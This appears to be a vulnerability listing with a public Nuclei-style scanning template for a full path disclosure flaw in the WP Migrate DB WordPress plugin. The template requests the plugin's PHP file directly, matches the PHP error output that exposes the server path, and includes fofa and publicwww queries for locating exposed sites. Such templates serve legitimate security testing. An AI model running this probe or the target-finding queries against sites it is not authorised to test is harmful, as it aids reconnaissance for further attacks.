The WP Migrate DB (WP Migrate Lite - WordPress Migration Made Easy) plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
PoC代码[已公开]
id: wp-migrate-db-fpd
info:
name: WordPress WP Migrate DB - Full Path Disclosure
author: pussycat0x
severity: low
description: |
The WP Migrate DB (WP Migrate Lite - WordPress Migration Made Easy) plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
max-request: 1
publicwww-query: "/wp-content/plugins/wp-migrate-db/"
fofa-query: body="/wp-content/plugins/wp-migrate-db/"
tags: wordpress,wp,wp-plugin,fpd,wp-migrate-db,wpmdb
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-migrate-db/wp-migrate-db.php"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
- 'status_code == 200 || status_code == 500'
- 'contains(body, "wp-migrate-db")'
condition: and
# digest: 4a0a00473045022100a01649a064b08645f307ddadc80e7f716b429784bbf56fe5445e9cde12340b31022005340d7e21e177f4b9530e1f2ce3c6100fbfb3d0630a67b42f477da88bd8683a:922c64590222798bb761d5b6d8e72950